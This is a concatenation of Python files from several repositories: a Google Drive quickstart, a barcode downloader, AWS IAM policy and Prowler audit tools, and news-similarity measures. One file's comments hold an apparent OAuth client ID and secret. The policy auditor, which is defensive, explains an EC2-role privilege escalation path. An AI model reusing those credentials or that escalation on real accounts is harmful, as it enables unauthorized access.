check_inputs_mock.assert_called_once_with(os.path.abspath('.'), do_il=False, check_binaries=False)
check_conv_tools.assert_called_once_with(do_il=False)
@patch('oasislmf.cmd.bin.check_inputs_directory')
@patch('oasislmf.cmd.bin.check_conversion_tools')
def test_target_is_supplied___supplied_path_is_checked(self, check_conv_tools, check_inputs_mock):
with TemporaryDirectory() as d:
cmd = get_command(target_dir=d)
res = cmd.run()
self.assertEqual(0, res)
check_inputs_mock.assert_called_once_with(d, do_il=False, check_binaries=False)
check_conv_tools.assert_called_once_with(do_il=False)
@patch('oasislmf.cmd.bin.check_inputs_directory')
@patch('oasislmf.cmd.bin.check_conversion_tools')
def test_do_il_is_true___il_input_files_are_checked(self, check_conv_tools, check_inputs_mock):
with TemporaryDirectory() as d:
cmd = get_command(target_dir=d, extras={'do-il': ''})
res = cmd.run()
self.assertEqual(0, res)
check_inputs_mock.assert_called_once_with(d, do_il=True, check_binaries=False)
check_conv_tools.assert_called_once_with(do_il=True)
@patch('oasislmf.cmd.bin.check_inputs_directory')
@patch('oasislmf.cmd.bin.check_conversion_tools')
def test_check_binaries_is_true__existance_of_bin_files_are_checked(self, check_conv_tools, check_inputs_mock):
with TemporaryDirectory() as d:
cmd = get_command(target_dir=d, extras={'check-binaries': ''})
res = cmd.run()
self.assertEqual(0, res)
check_inputs_mock.assert_called_once_with(d, do_il=False, check_binaries=True)
check_conv_tools.assert_called_once_with(do_il=False)
``` |
{
"source": "jonathanbglass/barcodes",
"score": 3
} |
#### File: jonathanbglass/barcodes/gdrive.py
```python
from __future__ import print_function
import httplib2
import os
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/drive-python-quickstart.json
SCOPES = 'https://www.googleapis.com/auth/drive.metadata.readonly'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'JB-Python'
def get_credentials():
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'drive-python-quickstart.json')
store = Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
print('Storing credentials to ' + credential_path)
return credentials
def findimages(drive_service):
page_token = None
while True:
        # The Drive API `q` parameter is a query string, not a dict
        query = "name = 'IFTTT' and mimeType = 'application/vnd.google-apps.folder'"
        response = drive_service.files().list(q=query,
                                              fields='nextPageToken, files(id, name)',
                                              pageToken=page_token).execute()
for file in response.get('files', []):
# Process change
print ('Found file: ' + file.get('name') + file.get('id'))
page_token = response.get('nextPageToken', None)
if page_token is None:
break
def main():
"""Shows basic usage of the Google Drive API.
Creates a Google Drive API service object and outputs the names and IDs
for up to 10 files.
"""
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
service = discovery.build('drive', 'v3', http=http)
findimages(service)
results = service.files().list(
pageSize=100,fields="nextPageToken, files(id, name)").execute()
items = results.get('files', [])
if not items:
print('No files found.')
else:
print('Files:')
for item in items:
print('{0} ({1})'.format(item['name'], item['id']))
if __name__ == '__main__':
main()
```
#### File: jonathanbglass/barcodes/get_label_barcodes.py
```python
import os
from os import listdir
from os.path import isfile, join
import argparse
import requests
import shutil
import time
# 861094493354-cfvvblgc9a0ukdk3ouomj3pdb599qeml.apps.googleusercontent.com
# ue4c3mBtH8srX9p6xV2ujkck
def gen_large(upc):
url = "http://www.waspbarcode.com/barcode-maker"
print (upc)
payload = {'q':'python',
'__VIEWSTATE':'/<KEY>',
'__VIEWSTATEGENERATOR': 'D2163E31',
'__EVENTVALIDATION': '/wEdABBZEZXJCrXVLa4/ZCCdg+ptp6Wh9EdvDOtAY7Kw6QJZBahOTAnKTVDqtmKphJo8TEXQnYXUIRSWjp6YpdzbGcVy1H7Lp7UqDhmRJQXvvUQVESrSvRBeaiRDN+dziPPpbMQe8fGpYxpBDyOINs6Js4HnPaWuJlNQyjbNvwNvvXiHYpBv0ry8hoG5zy58yO8NR4hwYULD/xQDE5+DRqDqsB9UrxCQcRSIL0HndruRNlianUlI7p5F0NYPySEUDybhMD6uLaXkb+BrSP5DHdWZcwmLiRmX6xsjdlvskrKlxB7M8eQuCE6VNfx2Sqr3tnHNfjPh4uoE4MrSwShG8jl8PJ5VAJGoDkNcRQZ826H3634uP8/MzH4Z3yZDTwgFhWz6Png=',
'ph_content_0$ddlType': 'UPC-A',
'ph_content_0$txtCode': upc,
'ph_content_0$txtEmail': '<EMAIL>',
'ph_content_0$ctl00': 'Generate' }
r = requests.post(url, payload)
return
def gen_thumbnail(upc):
thumbnailurl="http://www.waspbarcode.com/services/waspbarcode/barcodegen.ashx?symbology=UpcA&code="+upc
t = requests.get(thumbnailurl, stream=True)
if t.status_code == 200:
with open("attachments/"+upc+".png", 'wb') as out_image:
shutil.copyfileobj(t.raw, out_image)
del t
else:
print (t.status_code, t.headers['content-type'], t.encoding)
return
def check_files(upc):
if os.path.exists('labels/'+upc+'_thumbnail.png'):
print ('labels/'+upc+'_thumbnail.png exists')
else:
print ("gen_thumbnail("+upc+")")
gen_thumbnail(upc)
if os.path.exists('labels/'+upc+'_large.png'):
print ('labels/'+upc+'_large.png exists')
else:
print ("gen_large("+upc+")")
gen_large(upc)
return
def main():
translation_table = dict.fromkeys(map(ord, '*\n'), None)
url = "http://www.waspbarcode.com/barcode-maker"
a = open('c:/output/upcs','r')
for line in a:
upc = line.translate(translation_table)
check_files(upc)
if __name__ == "__main__":
main()
``` |
{
"source": "jonathanbglass/parallel_prowler",
"score": 2
} |
#### File: jonathanbglass/parallel_prowler/collect_policies.py
```python
import argparse
import boto3
import json
import logging
import os
from progressbar import ProgressBar
import sys
"""
Collects IAM Policies
Evaluates policies looking for badness (*.*, Effect:Allow + NotAction)
Need to add more tests/use cases
"""
def get_policies(profile):
session = boto3.session.Session(profile_name=profile)
myiam = session.client('iam')
marker = None
allPolicies = []
passcount = 1
while True:
pbar = ProgressBar('Collecting Policies')
print("Policy Collection, Pass Number: {}".format(passcount))
passcount += 1
if marker:
response_iterator = myiam.list_policies(OnlyAttached=True,
Marker=marker)
else:
response_iterator = myiam.list_policies(OnlyAttached=True)
for p in pbar(response_iterator['Policies']):
polVers = myiam.get_policy_version(
PolicyArn=p['Arn'], VersionId=p['DefaultVersionId'])
mypol = {'Policy': p, 'PolicyVersion': polVers['PolicyVersion']}
allPolicies.append(mypol)
pfl = open(os.path.join('policies/', p['PolicyName']+'.json'), 'w')
pfl.write(json.dumps(mypol, default=str, indent=4))
pfl.close()
ae = myiam.list_entities_for_policy(PolicyArn=p['Arn'])
pfl = open(os.path.join('attachedentities/',
p['PolicyName']+'.json'), 'w')
pfl.write(json.dumps(ae, default=str, indent=4))
pfl.close()
try:
marker = response_iterator['Marker']
except KeyError:
break
print("\nTotal Policies: {}".format(len(allPolicies)))
pbar = ProgressBar('\tChecking for Dangerous Policies')
for p in pbar(allPolicies):
# This section looks for bad/dangerous patterns
# Pattern 1: Allow *.*
# AWSLambdaRole {
# 'Version': '2012-10-17',
# 'Statement': [
# {'Effect': 'Allow',
# 'Action': '*',
# 'Resource': ['*']
# }
# ]
# }
try:
q = p['PolicyVersion']['Document']['Statement'][0]
except Exception as e:
print("Problem parsing this policy: {}".format(p))
logging.debug("Problem parsing this policy: {}".format(p))
print(e)
continue
try:
if (q['Effect'] == "Allow" and '*' in q['Resource']
and '*' in q['Action']):
print("Review Dangerous Policy: {} -> {}".format(
p['Policy']['PolicyName'],
p['PolicyVersion']['Document']))
except Exception as e:
pass
# Pattern 2: Allow: *, NotAction
# {'Version': '2012-10-17',
# 'Statement': [
# {
# 'Effect': 'Allow',
# 'NotAction': ['iam:*', 'organizations:*', 'account:*'],
# 'Resource': '*'
# },
# {
# 'Effect': 'Allow',
# 'Action': [ 'iam:CreateServiceLinkedRole',
# 'iam:DeleteServiceLinkedRole',
# 'iam:ListRoles',
# 'organizations:DescribeOrganization',
# 'account:ListRegions'
# ],
# 'Resource': '*'
# }
# ]}
# This policy blacklists all 'iam:*', 'organizations:*', and
# 'accounts:*' with the NotAction. Then it grants specific
# access in the next stanza ('iam:ListRoles', etc)
# The fatal flaw is that it grants access to everything else,
# like lambda or ec2 because of the "Allow" in the first stanza.
# This user can create an EC2 instance, attach an admin role to
# it, and login and give themselves access to Admin. Instance
# privilege escalation.
try:
if (q['NotAction'] and q['Effect'] == 'Allow'
and q['Resource'] == '*'):
print("Review Suspect Policy: {} -> {}".format(
p['Policy']['PolicyName'],
p['PolicyVersion']['Document']))
except Exception as e:
pass
return
def check_args_creds(args):
# handle profiles / authentication / credentials
workingCreds = False
global logging
global workingProfiles
workingProfiles = []
if not args.profile:
logging.info("Using AWS Default Profile")
if (not check_profile("default")):
logging.error("Default credentials not working.")
print("Default credentials not working.")
quit()
else:
workingProfiles.append("default")
workingCreds = True
if args.profile and args.profile is not None:
logging.info("Using " + args.profile + " Profile")
if (not check_profile(args.profile)):
logging.error("Profile " + args.profile + " not working")
exit(1)
else:
logging.info("Profile " + args.profile + " working")
workingProfiles.append(args.profile)
workingCreds = True
return args.profile
def check_profile(profile):
global logging
try:
if(profile == "default"):
client = boto3.session.Session()
else:
logging.info("Testing profile: " + profile)
client = boto3.session.Session(profile_name=profile)
except Exception as e:
logging.error("Error connecting: ")
logging.error(e)
return False
try:
iam = client.client('iam')
response = iam.list_users()
except Exception as e:
logging.error("Error listing users: ")
logging.error(e)
return False
if len(response['Users']) == 0:
logging.info("No users")
if len(response) > 0:
usercnt = len(response['Users'])
if(usercnt > 1):
userresp = " Users"
else:
userresp = " User"
logging.info(str(usercnt) + userresp)
return True
def setup_args(parser):
parser.add_argument("-p", "--profile",
help="AWS Profile")
parser.add_argument("-l", "--log",
help="Log Level")
def main():
global logging
parser = argparse.ArgumentParser()
setup_args(parser)
global args
args = parser.parse_args()
if args.log and args.log.upper() == "DEBUG":
loglevel = "DEBUG"
else:
loglevel = "INFO"
logging.basicConfig(filename='policyAssessment.log',
format='%(levelname)s:%(message)s',
level=loglevel)
profile = check_args_creds(args)
get_policies(profile)
if __name__ == "__main__":
# execute only if run as a script
main()
```
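Note that the pattern checks above only inspect `Statement[0]` of each policy document, so a dangerous statement appearing later in the list would be missed. A hedged sketch of the same two checks applied to every statement, tolerating both dict/list statements and string/list `Action`/`Resource` values:
```python
def find_dangerous_statements(policy_document):
    """Yield (reason, statement) for Allow */* and Allow + NotAction statements."""
    statements = policy_document.get('Statement', [])
    if isinstance(statements, dict):   # a policy may carry a single statement object
        statements = [statements]
    for stmt in statements:
        if stmt.get('Effect') != 'Allow':
            continue
        action = stmt.get('Action', [])
        resource = stmt.get('Resource', [])
        action = [action] if isinstance(action, str) else action
        resource = [resource] if isinstance(resource, str) else resource
        if '*' in action and '*' in resource:
            yield ('allow-star-star', stmt)
        elif 'NotAction' in stmt and '*' in resource:
            yield ('allow-notaction', stmt)
```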
#### File: jonathanbglass/parallel_prowler/parallel_prowler.py
```python
import argparse
import boto3
import csv
import json
import logging
import mmap
import numpy as np
import os
import pandas as pd
import psutil
import queue
from shlex import quote
import subprocess
import sys
import threading
import time
import uuid
def setup_args(parser):
parser.add_argument("-p", "--profile",
help="AWS Profile")
parser.add_argument("-pp", "--prowlerPath",
help="Path to Prowler Executable. "
"Defaults to ./prowler/prowler")
parser.add_argument("-pc", "--prowlerCheck",
help="Single or List of Prowler Check(s) [check11]")
parser.add_argument("-pg", "--prowlerGroup",
help="Group of Prowler Checks [cislevel2]")
parser.add_argument("-pE", "--prowlerExclude",
help="Execute all tests except a list of specified "
"checks separated by comma (i.e. check21,check31)")
parser.add_argument("-R", "--region",
help="AWS Region")
parser.add_argument("-r", "--regex",
help="REGEX Pattern to Identify AWS Profiles")
parser.add_argument("-o", "--outputDir",
help="Output Directory")
# parser.add_argument("-o", "--organization",
# help="AWS Profile for Organization Account")
parser.add_argument("-t", "--maxthreads", type=int,
help="Max threads: defaults to # of CPUs")
parser.add_argument("-F", "--resultsFile", type=str,
help="Results CSV to process to a report XLSX file")
parser.add_argument("-l", "--log", type=str,
choices=['info', 'INFO', 'debug', 'DEBUG'],
help="Set LogLevel to INFO (Default) or DEBUG")
parser.add_argument("-v", "--verbosity", type=int, choices=[0, 1],
help="increase output verbosity")
def check_args_debug(args):
# Handle logging
global outputDir
global logging
if args.log and args.log.upper() == "DEBUG":
loglevel = "DEBUG"
else:
loglevel = "INFO"
logging.basicConfig(filename=outputDir + '/' + 'assessment.log',
format='%(levelname)s:%(message)s',
level=loglevel)
def check_args_prowlerPath(args):
# Handle prowlerPath
global logging
global prowlerPath
if args.prowlerPath and os.path.exists(args.prowlerPath):
prowlerPath = args.prowlerPath
else:
if not os.path.exists("./prowler/prowler"):
print("Prowler not found. Install or clone the repository into "
"this directory or provide the path with -pp, --prowlerPath")
quit()
else:
prowlerPath = "./prowler/prowler"
def check_args_verbosity(args):
# handle verbosity
global logging
global verbose
if args.verbosity == 1:
verbose = True
logging.info("Verbose")
else:
verbose = False
logging.info("No Verbosity")
def check_args_creds(args):
# handle profiles / authentication / credentials
workingCreds = False
global logging
global verbose
global workingProfiles
workingProfiles = []
if not args.profile and not args.regex:
logging.info("Using AWS Default Profile")
if verbose:
print("Using AWS Default Profile")
print(args.profile)
if (not check_profile("default")):
logging.error("Default credentials not working.")
print("Default credentials not working.")
quit()
else:
workingProfiles.append("default")
workingCreds = True
if args.profile and args.profile is not None:
logging.info("Using " + args.profile + " Profile")
if verbose:
print("Using " + args.profile + " Profile")
if (not check_profile(args.profile)):
logging.error("Profile " + args.profile + " not working")
if verbose:
print("Profile " + args.profile + " not working")
quit()
else:
logging.info("Profile " + args.profile + " working")
if verbose:
print("Profile " + args.profile + " working")
workingProfiles.append(args.profile)
workingCreds = True
def check_args_regex(args):
global logging
global verbose
if not args.regex:
logging.info("No REGEX Pattern. Working on a single account.")
if verbose:
print("No REGEX Pattern. Working on a single account.")
else:
# To Do: turn these variable into arguments
configFile = "~/.aws/config"
credFile = "~/.aws/credentials"
profileCount = 0
if os.path.exists(os.path.expanduser(configFile)):
configFileContent = open(
os.path.expanduser(configFile), 'r').read()
else:
logging.error("AWS Config file unreadable")
print("AWS Config file unreadable")
quit()
if args.regex in configFileContent:
logging.info("REGEX found")
if verbose:
print("REGEX found")
for x in configFileContent.split("\n"):
if "[profile" in x and args.regex in x:
profileCount += 1
thisProfile = x.strip('[]').split(" ")[1]
logging.debug("Checking profile: " + thisProfile)
if verbose:
print("Checking profile: " + thisProfile)
if (check_profile(thisProfile)):
logging.debug("Profile " + thisProfile + " works.")
if verbose:
print("Profile " + thisProfile + " works.")
workingProfiles.append(thisProfile)
else:
logging.debug("Profile " + thisProfile
+ " does not work.")
if verbose:
print("Profile " + thisProfile + " does not work.")
if (profileCount > 1) or (profileCount == 0):
profresp = (str(profileCount) + " Profiles found. "
+ str(len(workingProfiles)) + " Profiles work.")
else:
profresp = str(profileCount) + " Profile found and works"
if(len(workingProfiles) == 0):
logging.error("No working profiles, REGEX: " + str(args.regex))
print("No working profiles for REGEX: " + str(args.regex))
quit()
print(profresp)
logging.info(profresp)
else:
logging.error("REGEX " + str(args.regex)
+ " not found in " + configFile)
print("REGEX " + str(args.regex) + " not found in " + configFile)
quit()
def check_args_outputDir(args):
global logging
global outputDir
outputDir = os.path.abspath(os.curdir)
if args.outputDir:
if not os.path.exists(args.outputDir):
print("Output Directory Does Not Exist: " + args.outputDir)
quit()
else:
outputDir = os.path.abspath(args.outputDir)
def process_args(args):
check_args_outputDir(args)
check_args_debug(args)
check_args_verbosity(args)
check_args_prowlerPath(args)
check_args_creds(args)
check_args_regex(args)
def check_profile(profile):
global logging
try:
if(profile == "default"):
client = boto3.session.Session()
else:
logging.info("Testing profile: " + profile)
client = boto3.session.Session(profile_name=profile)
except Exception as e:
logging.error("Error connecting: ")
logging.error(e)
return False
try:
iam = client.client('iam')
response = iam.list_users()
except Exception as e:
logging.error("Error listing users: ")
logging.error(e)
return False
if len(response['Users']) == 0:
logging.info("No users")
if len(response) > 0:
usercnt = len(response['Users'])
if(usercnt > 1):
userresp = " Users"
else:
userresp = " User"
logging.info(str(usercnt) + userresp)
return True
def run_prowler(x):
global args
global logging
global outputDir
global prowlerPath
global resultDict
global verbose
logging.debug("Inside run_prowler: " + x)
if verbose:
print("Inside run_prowler: " + x)
cmd = os.path.realpath(prowlerPath)
cmdopts = ' -p {}'.format(quote(x))
if args.region:
        cmdopts += ' -r {}'.format(quote(args.region))
else:
cmdopts += ' -r us-east-1'
if args.prowlerExclude:
cmdopts += ' -E {}'.format(quote(args.prowlerExclude))
cmdopts += ' -n'
cmdopts += ' -b -M csv'
if args.prowlerCheck is not None:
cmdopts += ' -c {}'.format(quote(args.prowlerCheck))
if args.prowlerGroup is not None:
cmdopts += ' -g {}'.format(quote(args.prowlerGroup))
logging.info(cmd+cmdopts)
if verbose:
print(cmd+cmdopts)
p = subprocess.run([cmd + cmdopts], shell=True, text=True, check=False,
capture_output=True)
logging.debug("Inside run_prowler - subprocess: ")
logging.info(p)
if verbose:
print("Inside run_prowler - subprocess")
print(p)
resultDict[x] = p.stdout
fname = 'prowler-' + str(int(scanTime)) + '-' + str(scanUUID)\
+ '-' + quote(x) + '.csv'
fname = outputDir + '/' + fname
f = open(fname, 'w')
f.write(p.stdout)
f.close()
def worker():
global logging
global q
global resultDict
global verbose
while True:
x = q.get()
if x is None: # EOF?
return
else:
logging.debug("Inside worker: " + x)
if verbose:
print("Inside worker: " + x)
run_prowler(x)
def check_args_organizations(args):
global logging
pass
# # Handle Organizations and use it to create list of accounts to audit
# if not args.organization:
# logging.info("No AWS Organization Account")
# if verbose:
# print("No AWS Organization Account")
# else:
# print("Not implemented yet")
def get_col_widths(dataframe, index):
# First we find the maximum length of the index column
if index:
idx_max = max([len(str(s)) for s in dataframe.index.values]
+ [len(str(dataframe.index.name))])
return [idx_max] + [max([len(str(s)) for s in dataframe[col].values]
+ [len(col)]) for col in dataframe.columns]
else:
# Then, we concatenate this to the max of the lengths of column name
# and its values for each column, left to right
return [max([len(str(s)) for s in dataframe[col].values]
+ [len(col)]) for col in dataframe.columns]
def process_results(resultFileName):
global args
global logging
    # Respect the global verbose flag if process_args() set it; default to False otherwise
    verbose = bool(globals().get('verbose', False))
if args.resultsFile:
excelName = args.resultsFile.split('.')[0] + '.xlsx'
else:
excelName = 'results-'+str(int(scanTime))+'-'+str(scanUUID)+'.xlsx'
if 'outputDir' in globals():
excelName = outputDir + '/' + excelName
p_df = pd.read_csv(resultFileName,
dtype={'ACCOUNT_NUM': str, 'TITLE_ID': str})
if verbose:
print(p_df.shape)
print(p_df)
writer = pd.ExcelWriter(excelName, engine='xlsxwriter')
workbook = writer.book
# Write Summary first
q3 = ('(LEVEL == "Level 1" or LEVEL == "Level 2") and '
'(RESULT == "PASS" or RESULT == "FAIL")')
p_df_pass = p_df.query(q3)
if verbose:
print(p_df_pass)
p_df_pass.groupby(['PROFILE', 'ACCOUNT_NUM', 'RESULT'])['RESULT'].count().to_excel(writer, sheet_name="Summary")
worksheet = writer.sheets['Summary']
for i, width in enumerate(get_col_widths(p_df, False)):
worksheet.set_column(i, i, width)
# Write raw results to Excel
p_df.to_excel(writer, sheet_name='RawResults', index=False)
worksheet = writer.sheets['RawResults']
for i, width in enumerate(get_col_widths(p_df, False)):
worksheet.set_column(i, i, width)
# Write Passing results to Excel
q1 = 'RESULT == "PASS"'
p_df_pass = pd.pivot_table(
p_df.query(q1),
index=['TITLE_ID', 'TITLE_TEXT'],
columns=['PROFILE', 'ACCOUNT_NUM'], values='RESULT',
aggfunc=np.count_nonzero, fill_value=0)
p_df_pass.to_excel(writer, sheet_name="All Passing")
# Write Failing results to Excel
q2 = 'RESULT == "FAIL"'
p_df_fail = pd.pivot_table(
p_df.query(q2),
index=['TITLE_ID', 'TITLE_TEXT'],
columns=['PROFILE', 'ACCOUNT_NUM'], values='RESULT',
aggfunc=np.count_nonzero, fill_value=0)
p_df_fail.to_excel(writer, sheet_name="All Failing")
# Write CIS Benchmarks Passing results to Excel
q3 = 'RESULT == "PASS" and (LEVEL == "Level 1" or LEVEL == "Level 2")'
p_df_cis_pass = pd.pivot_table(
        p_df.query(q3),
index=['TITLE_ID', 'LEVEL', 'SCORED', 'TITLE_TEXT'],
columns=['PROFILE', 'ACCOUNT_NUM'], values='RESULT',
aggfunc=np.count_nonzero, fill_value=0)
p_df_cis_pass.to_excel(writer, sheet_name="CIS Benchmarks Passing")
# Write CIS Benchmarks failing results to Excel
q4 = 'RESULT == "FAIL" and (LEVEL == "Level 1" or LEVEL == "Level 2")'
p_df_cis_fail = pd.pivot_table(
        p_df.query(q4),
index=['TITLE_ID', 'LEVEL', 'SCORED', 'TITLE_TEXT'],
columns=['PROFILE', 'ACCOUNT_NUM'], values='RESULT',
aggfunc=np.count_nonzero, fill_value=0)
p_df_cis_fail.to_excel(writer, sheet_name="CIS Benchmarks Failing")
print("Report Excel File: " + excelName)
writer.save()
def main():
global logging
parser = argparse.ArgumentParser()
setup_args(parser)
global args
args = parser.parse_args()
if not args.resultsFile:
process_args(args)
global resultDict
resultDict = {}
global scanUUID
global scanTime
# Generate a Testing UUID and TimeStamp to add to logs / results
scanUUID = uuid.uuid4()
scanTime = time.time()
logging.info(scanUUID)
logging.info(int(scanTime))
if verbose:
print(scanUUID)
print(int(scanTime))
# setting up queues
global q
q = queue.Queue()
# process workingProfiles, run assessment tool(s) against each Profile
for x in workingProfiles:
q.put(x)
if args.maxthreads and args.maxthreads > 0:
maxthreads = int(args.maxthreads)
else:
maxthreads = psutil.cpu_count(logical=False)
threads = [threading.Thread(target=worker) for _i in range(maxthreads)]
for thread in threads:
thread.start()
q.put(None) # one EOF marker for each thread
for thread in threads:
thread.join()
header = False
resultFileName = 'results-'+str(int(scanTime))+'-'+str(scanUUID)+'.csv'
resultFileName = outputDir + '/' + resultFileName
print("Opening CSV")
resultFile = open(resultFileName, 'w+')
for key in resultDict:
print("resultDict Key: " + key)
print("Value:")
print(resultDict[key])
for i in range(len(resultDict[key].split('\n'))):
if header:
if 'ACCOUNT_NUM' not in resultDict[key].split('\n')[i]:
resultFile.write(resultDict[key].split('\n')[i] + "\n")
else:
print("Writing Headers")
resultFile.write(resultDict[key].split('\n')[0] + "\n")
header = True
resultFile.close()
print("Result File: " + resultFileName)
process_results(resultFileName)
else:
if os.path.exists(args.resultsFile):
process_results(args.resultsFile)
else:
print('File unreadable: ' + str(args.resultsFile))
            logging.error('File unreadable: ' + str(args.resultsFile))
if __name__ == "__main__":
# execute only if run as a script
main()
``` |
{
"source": "JonathanBodine/stale-news",
"score": 3
} |
#### File: code/measures/article.py
```python
import datetime
from dateutil import parser
import pytz
class Article:
def __init__(self, company, timestamp, headline, article_text, md5_id):
self.company = company
est = pytz.timezone('US/Eastern')
self.timestamp = parser.parse(timestamp).replace(tzinfo=pytz.utc).astimezone(est)
self.headline = headline
# article_text should be stemmed and filtered articles
self.article_text = article_text
self.md5_id = md5_id
def __repr__(self):
return self.company + "; " + str(self.timestamp) + "; " + self.headline
def __eq__(self, other):
if isinstance(other, Article):
return (self.company == other.company and self.timestamp == other.timestamp and
self.headline == other.headline)
return False
def __lt__(self, other):
"""
Comparison operator for sorting Articles by timestamp.
"""
return self.timestamp < other.timestamp
def __hash__(self):
return hash(self.__repr__())
def elapsed_time_between(self, other):
"""
Returns the amount of time, in seconds, between the publishing
of this Article and another Article, other.
"""
elapsed_time = self.timestamp - other.timestamp
return abs(elapsed_time.total_seconds())
```
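A short, self-contained illustration of how Article objects sort and measure elapsed time (timestamps are arbitrary examples; assumes `article.py` is importable):
```python
from article import Article

a1 = Article('ACME', '2015-03-02 14:30:00', 'Acme beats estimates', 'acme beat estim', 'md5a')
a2 = Article('ACME', '2015-03-02 16:45:00', 'Acme raises guidance', 'acme rais guidanc', 'md5b')

print(a1 < a2)                        # True: ordering is by (timezone-converted) timestamp
print(a1.elapsed_time_between(a2))    # 8100.0 seconds, independent of argument order
print(sorted([a2, a1])[0].headline)   # 'Acme beats estimates'
```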
#### File: code/measures/cosine_similarity.py
```python
from article import Article
from measure_constants import MeasureConstants
import numpy as np
import datetime
from nltk.stem import PorterStemmer
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from sklearn.feature_extraction.text import TfidfVectorizer
stop_words = set(stopwords.words('english'))
ps = PorterStemmer()
vec = TfidfVectorizer()
class CosineSimilarity:
def __init__(self, measure_const = MeasureConstants()):
self.measure_const = measure_const
def stem_and_filter(self, text):
"""
Takes an article's text and tokenizes the article text into a set, then
removes stop words from the set and stems all the remaining words. Returns
a set of stemmed words in the article.
"""
tokenized = word_tokenize(text)
tokenized = [w for w in tokenized if w not in stop_words] # Remove stop words from tokenized text
stemmed = " ".join([ps.stem(w) for w in tokenized])
return stemmed
def bow_similarity_score(self, s1, s2):
"""
Returns the bag-of-words similarity score between an article s1 and article s2.
Specifically, measures percentage of words in s1 that are also in s2.
s1, s2 must be sets representing tokenized and stemmed articles.
"""
return len(s1.intersection(s2)) / len(s1)
def compute_sim_measure(self, curr_article, article_set):
"""
Calculates Old(s) and ClosestNeighbor(s), where s is curr_article.
Arguments:
curr_article: An Article object for which to calculate the scores
article_set: A set of Article objects with the same company as curr_article.company
            (the number of closest stories used for Old(s) is taken from
            self.measure_const.NUM_CLOSEST rather than passed as an argument)
Returns:
old_score: Old(s)
closest_neighbor_score: ClosestNeighbor(s)
"""
num_closest = self.measure_const.NUM_CLOSEST
curr_article_stemmed = set(curr_article.article_text.split())
stemmed_articles = [curr_article.article_text] + [s.article_text for s in article_set]
td_matrix = vec.fit_transform(stemmed_articles)
# Using the following method to calculate cosine similarity between documents:
# https://stackoverflow.com/questions/8897593/how-to-compute-the-similarity-between-two-text-documents
        # The line below multiplies the document-term matrix (one row per document, one column per term,
        # L2-normalized by TfidfVectorizer) by its transpose, giving the matrix of pairwise cosine
        # similarities between documents. Its first row holds the similarity of curr_article with every
        # document in stemmed_articles; the first entry is dropped so curr_article's similarity with
        # itself is not counted.
sim_scores = (td_matrix * td_matrix.T).A[0][1:]
closest_articles_indices = np.argsort(sim_scores)[::-1][:num_closest]
        # sim_scores excludes curr_article itself, so skip index 0 of stemmed_articles when mapping back
        closest_articles = np.take(stemmed_articles[1:], closest_articles_indices)
closest_articles_words = [c.split() for c in closest_articles]
closest_articles_union = set().union(*closest_articles_words)
intersect_with_closest_n = curr_article_stemmed.intersection(closest_articles_union)
old_score = len(intersect_with_closest_n) / len(curr_article_stemmed)
closest_neighbor_score = self.bow_similarity_score(curr_article_stemmed, closest_articles_words[0])
return old_score, closest_neighbor_score
def is_old_news(self, old):
return old > self.measure_const.OLD_NEWS
def is_reprint(self, old, closest_neighbor):
if old == 0:
return False
reprint = (closest_neighbor / old) >= self.measure_const.CLOSEST_NEIGHBOR_SHARE
return (old > self.measure_const.OLD_NEWS) * reprint
def is_recombination(self, old, closest_neighbor):
if old == 0:
return False
reprint = (closest_neighbor / old) < self.measure_const.CLOSEST_NEIGHBOR_SHARE
return (old > self.measure_const.OLD_NEWS) * reprint
```
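The docstring of `compute_sim_measure` describes Old(s) and ClosestNeighbor(s) in the abstract, so a small end-to-end sketch may help. It is not repository code; it assumes the NLTK `punkt` and `stopwords` data have been downloaded, and the article texts, timestamps, and ids are invented.
```python
from article import Article
from cosine_similarity import CosineSimilarity

cs = CosineSimilarity()
texts = [
    "Acme Corp beats quarterly earnings estimates on strong sales",
    "Acme Corp tops earnings estimates as its sales grow",
    "Acme Corp announces a new factory in Ohio",
]
stemmed = [cs.stem_and_filter(t) for t in texts]  # stemmed, stop-word-filtered strings

curr = Article("ACME", "2015-03-02T16:00:00Z", "Acme tops estimates", stemmed[0], "id-0")
prior = {
    Article("ACME", "2015-03-02T09:00:00Z", "Acme tops estimates again", stemmed[1], "id-1"),
    Article("ACME", "2015-03-01T09:00:00Z", "Acme builds factory", stemmed[2], "id-2"),
}

old_score, closest_neighbor = cs.compute_sim_measure(curr, prior)
print(old_score, closest_neighbor)
print(cs.is_old_news(old_score), cs.is_reprint(old_score, closest_neighbor))
```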
#### File: code/measures/sim_measures.py
```python
from measure_constants import MeasureConstants
from cosine_similarity import CosineSimilarity
from bow_similarity import BOWSimilarity
class SimiliarityMeasure:
def __init__(self, measure, measure_const = MeasureConstants()):
self.measure = None
if measure == "cosine":
self.measure = CosineSimilarity()
if measure == "bag_of_words":
self.measure = BOWSimilarity()
```
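How this small factory is meant to be used, continuing the sketch from the previous file (again not repository code):
```python
from sim_measures import SimiliarityMeasure

sim = SimiliarityMeasure("cosine")  # picks the backend by name
old_score, closest = sim.measure.compute_sim_measure(curr, prior)  # curr/prior from the sketch above
```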
#### File: replication/deprecated/generate_reg_data.py
```python
import utils as u
import utilsp as up
import databases as d
import pandas as pd
def generate_csv8_9(dates, firms, mdatabase, pdatabase1, pdatabase2, eight=True):
"""
Writes csv file for computation over dates given
dates: list of days in order from starting date to ending date, each date represents a date t used for computation
firms: list of tickers of interest
mdatabase: database of news measures
pdatabase1: crsp data frame
pdatabase2: compustat data frame
eight: True computes equation 8, False computes equation 9
"""
# append one day at the end for very last t+1 query
if not pdatabase1.dates:
pdatabase1.recordDates("date", False) # "date" is a col name in crsp
